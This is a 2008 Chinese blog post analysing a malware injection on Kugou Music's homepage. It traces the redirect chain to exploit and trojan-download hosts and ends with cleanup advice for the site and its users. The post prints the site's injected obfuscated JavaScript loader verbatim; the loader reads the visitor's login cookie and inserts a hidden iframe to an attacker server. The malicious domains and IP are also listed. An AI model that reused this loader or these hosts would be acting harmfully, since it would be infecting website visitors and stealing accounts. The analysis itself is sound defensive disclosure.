百度空间 | 百度首页 
               
 
查看文章
  
故技重施:酷狗音乐首页再次挂马~
2008年08月04日 星期一 16:43

挂的很隐蔽,但是还是老伎俩,详见:http://hi.baidu.com/yimike/blog/item/c466588d58f6fa17b31bba89.html

这次(8月4日)挂马流程简单入下:

h**p://www.kugou.com/home/cairing.htm
=>h**p://js.allko.com/js.aspx
    =>h**p://www.allko.com/index.aspx?id=0&n=0.23103216425319184
        =>h**p://www.qqwill.com/
        =>h**p://www.qqker.com/

详细点分析如下:

h**p://www.kugou.com/home/cairing.htm 被插入一个Script:

<SCRIPT src="h**p://js.allko.com/js.aspx"></SCRIPT>

h**p://js.allko.com/js.aspx的源代码如下:

<script language="JavaScript">
window.onerror=function(){return true;}
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2 t=18;2 w=17;2 h=0;2 b=c;2 9=0;2 z="";2 a=-1;8 f(){2 i=5.16.15();C=/14=(\\d+)&/g;4(C.A(i)){b=e;9=y.$1;B=/13=([^&]+)/g;B.A(i);z=12(y.$1).x("+"," ").x("+"," ");6 9}}f();8 u(){h++;4(h<w){f();4(b){7.v(a)}}11{7.v(a)}}4(!b){a=7.10(u,t)}8 j(){4(p()==e){2 3=5.Z(\'s\');4(!3){3=5.Y("X");3.q=\'s\';3.W=\'0\';3.V=\'0\';5.r.U(3,5.r.T)}3.S="m://l.R.k/Q.P?q="+9+"&n="+O.N()}}8 p(){M{2 o=L.7.K.J();4(o.I(0,H)==\'m://l.G.k/F\'){6 e}6 c}E(D){6 c}}j();',62,71,'||var|ecif|if|document|return|window|function|kid|IntervalID|IsLogined|false||true|GetUserCookie||TryCount|MyCookie|testgo|com|www|http||str1|ifgo1|id|body|cif111|IntervalTime|TryReadCookie|clearInterval|MaxTry|replace|RegExp|NickName|test|re2|re|e1|catch|home|kugou|25|substr|toString|location|top|try|random|Math|aspx|index|allko|src|firstChild|insert'.split('|'),0,{}))
</script>

执行这个脚本后,第一次访问该页面时会写入一个IFRAME到h**p://www.kugou.com/home/cairing.htm,即:

<IFRAME id=cif111 src="h**p://www.allko.com/index.aspx?id=0&n=0.23103216425319184" width=0 height=0></IFRAME>

然后当浏览器访问这里的h**p://www.allko.com/index.aspx?id=0&n=0.23103216425319184时,远程服务器会返回两个挂马URL,即: h**p://www.qqwill.com/和h**p://www.qqker.com/,如图:

其中,域名allko.com、qqwill.com、qqker.com三个域名指向的主机IP(61.157.109.66 / 四川省宜宾市电信)相同。

qqwill.com挂马详情如下:

Log is generated by FreShow.
h**p://www.qqwill.com/
    h**p://g.ggg002.cn/du1.htm
        h**p://g.ggg002.cn/ghost.html
            h**p://user1.asp-33.cn/ie.swf
                h**p://user1.12-73.cn/bak4.css
            h**p://user1.asp-33.cn/ff.swf
                h**p://user1.12-73.cn/bak4.css
            [script]h**p://user1.asp-33.cn/ms06014.js
                h**p://user1.12-73.cn/bak.css
            h**p://user1.asp-33.cn/GLWORLD.html
                h**p://tw.us.tw/us.exe(无法解析域名)
            h**p://user1.asp-33.cn/real.js(0 Byte)
            h**p://user1.asp-33.cn/Real.html
                h**p://tw.us.tw/us.exe
            h**p://user1.asp-33.cn/Qvod.html
                h**p://tw.us.tw/us.exe

bak.css和bak4.cssMD5相同,运行后连接到h**p://t.txt-01.cn/d.txt,下载盗号木马等33只。

qqker.com尚在建设中,今天(8月4日)下午4点检查时未发现恶意代码。

如何解决此威胁?

对于酷狗官方来说,暂时的解决办法是清除cairing.htm源代码中被插入的恶意Script。让后再查找服务器漏洞,避免再次被植入恶意代码。

对于普通用户来说,建议如下:

1.卸载酷狗音乐,并将h**p://www.kugou.com屏蔽。该站点多次被植入恶意代码,但并未引起官方的重视。就冲着酷狗官方这种对用户不负责任的态度,不用酷狗也无所谓。

2.即时更新杀毒软件病毒库到最新,并开启实时监视。

3..打全系统补丁,更新Flash插件、联众世界、Realplayer、QVOD、迅雷看看等软件到最新。


类别:默认分类 | 添加到搜藏 | 浏览() | 评论 (2)
 
最近读者:
 
网友评论:
1
2008年08月04日 星期一 16:51 | 回复
我用QQ音乐
 
2
2008年08月04日 星期一 20:46 | 回复
谢谢分享转载下 没用过酷狗
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu